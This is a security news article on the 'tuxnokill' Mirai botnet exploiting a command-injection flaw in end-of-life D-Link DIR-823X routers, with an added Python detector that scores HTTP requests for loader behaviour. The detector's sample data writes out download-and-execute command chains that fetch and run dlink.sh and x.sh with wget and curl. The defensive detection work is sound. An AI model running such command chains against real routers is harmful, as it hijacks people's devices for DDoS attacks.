Ancient D-Link Routers Hijacked by New “Tuxnokill” Mirai Botnet
Routers that have long been out of official support have become the focus of a new wave of attacks. Attackers are exploiting a command-injection flaw in end-of-life hardware to quietly enlist home routers into a growing botnet.
The flaw in D-Link DIR-823X routers, tracked as CVE-2025-29635 (CVSS score 8.8), allows arbitrary command execution via a crafted POST request. By sending a single request to the vulnerable endpoint, an attacker can make the router run commands of their choosing.
Akamai identified the campaign in March 2026. Although the vulnerability was disclosed more than a year earlier, evidence of in-the-wild exploitation only surfaced recently. The activity was captured by a global network of honeypots that emulate vulnerable devices.
The attack itself is straightforward. The injected command changes into a writable directory on the device, downloads a script named dlink.sh from a remote server, and runs it. The script installs a Mirai-derived variant known as tuxnokill. The payload is built for multiple CPU architectures, so the same loader works against a wide range of hardware.
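As an added example (not code from the original article or from Akamai's report), the following Python script scores HTTP request bodies for the loader pattern described above: a shell command chain that changes into a writable directory, fetches a script with wget or curl, marks it executable and runs it, with the filename dlink.sh as a strong indicator. The request records, IP addresses and the endpoint path /cgi-bin/example.cgi are constructed for illustration; they are not the real DIR-823X endpoint or real attacker infrastructure, and the indicator weights and threshold are the author's own choices.

```python
import re

# Directories a Mirai-style loader typically tries to cd into before
# downloading its dropper (the set is an assumption, not from the article).
WRITABLE_DIRS = ("/tmp", "/var/run", "/var/tmp", "/mnt", "/dev/shm")

# Each indicator: (name, compiled regex, weight). Weights are illustrative.
INDICATORS = [
    ("shell_chain", re.compile(r"(\|\||&&|;|`|\$\()"), 1),
    ("cd_writable_dir", re.compile(
        r"\bcd\s+(?:%s)\b" % "|".join(re.escape(d) for d in WRITABLE_DIRS)), 2),
    ("downloader", re.compile(r"\b(wget|curl|tftp|ftpget)\b"), 2),
    ("chmod_exec", re.compile(r"\bchmod\s+(?:\+x|[0-7]?7{2,3})\b"), 1),
    ("run_script", re.compile(r"(?:\bsh\s+|\./)\S+\.sh\b"), 2),
    ("dlink_sh", re.compile(r"\bdlink\.sh\b"), 3),
]

# Download URLs embedded in the command chain, stopped at shell separators.
URL_RE = re.compile(r"(?:https?|tftp)://[^\s;|&\"']+")

# Constructed honeypot-style request records (not real captures).
# "/cgi-bin/example.cgi" is a placeholder path, not the vulnerable endpoint.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "POST", "path": "/cgi-bin/example.cgi",
     "body": "cd /tmp || cd /var/run || cd /mnt; wget http://198.51.100.7/dlink.sh; "
             "chmod 777 dlink.sh; sh dlink.sh"},
    {"src": "203.0.113.11", "method": "POST", "path": "/cgi-bin/example.cgi",
     "body": "hostname=router&timezone=UTC"},
    {"src": "203.0.113.12", "method": "GET", "path": "/index.html", "body": ""},
    {"src": "203.0.113.13", "method": "POST", "path": "/login.cgi",
     "body": "user=admin; curl -O http://198.51.100.9/x.sh; chmod +x x.sh; ./x.sh"},
]


def classify_request(req):
    """Score one request for Mirai-style loader behaviour.

    Returns a dict with the summed indicator weight, the names of the
    indicators that matched, and any download URLs found in the body.
    """
    body = req.get("body", "")
    matched = [name for name, rx, _ in INDICATORS if rx.search(body)]
    score = sum(w for name, _, w in INDICATORS if name in matched)
    return {"src": req.get("src"), "path": req.get("path"), "score": score,
            "indicators": matched, "urls": URL_RE.findall(body)}


def scan(requests, threshold=5):
    """Return the classified requests whose score reaches the threshold."""
    hits = [classify_request(r) for r in requests]
    return [h for h in hits if h["score"] >= threshold]


if __name__ == "__main__":
    for h in scan(SAMPLE_REQUESTS):
        print(f'{h["src"]} {h["path"]} score={h["score"]} '
              f'urls={h["urls"]} via {h["indicators"]}')
```

The benign form submission scores zero because it contains no command separators or download tools, while the second malicious record is flagged on the generic chain (download, chmod, execute) even without the dlink.sh filename, which is the behaviour you want when the same actor rotates script names across the TP-Link and ZTE targets.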
The malware's capabilities match the standard Mirai profile. Infected devices are used for distributed denial-of-service (DDoS) attacks, flooding targets with TCP and UDP traffic or with a high volume of HTTP requests.
The threat actor is not limited to a single vendor. In parallel, the group is exploiting CVE-2023-1389 in TP-Link routers and a separate remote command execution vulnerability in ZTE ZXV10 H108L devices. The pattern is the same in every case: gain initial access, download the payload, and install the Mirai variant.
The situation is made worse by the fact that the affected hardware reached End of Life (EoL) in November 2024. The manufacturer no longer issues security fixes, even for actively exploited flaws, so the final firmware versions will likely remain vulnerable indefinitely.
Owners of these routers should replace them. As long as such a device stays online it can be compromised without the owner noticing. At a minimum, disable remote management interfaces (administration from the WAN side), change the default administrative credentials, and monitor the device configuration for unexpected changes such as altered DNS settings or new port forwards.